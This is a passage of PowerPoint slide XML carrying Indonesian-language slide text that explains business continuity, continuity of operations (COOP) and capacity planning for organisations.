              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keselamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kesinambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keduanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeliharaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlangsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> COOP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkaitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi-fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesinambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kapasitas</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan di masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>depan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>evaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perkiraan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diantisipasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keahlian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
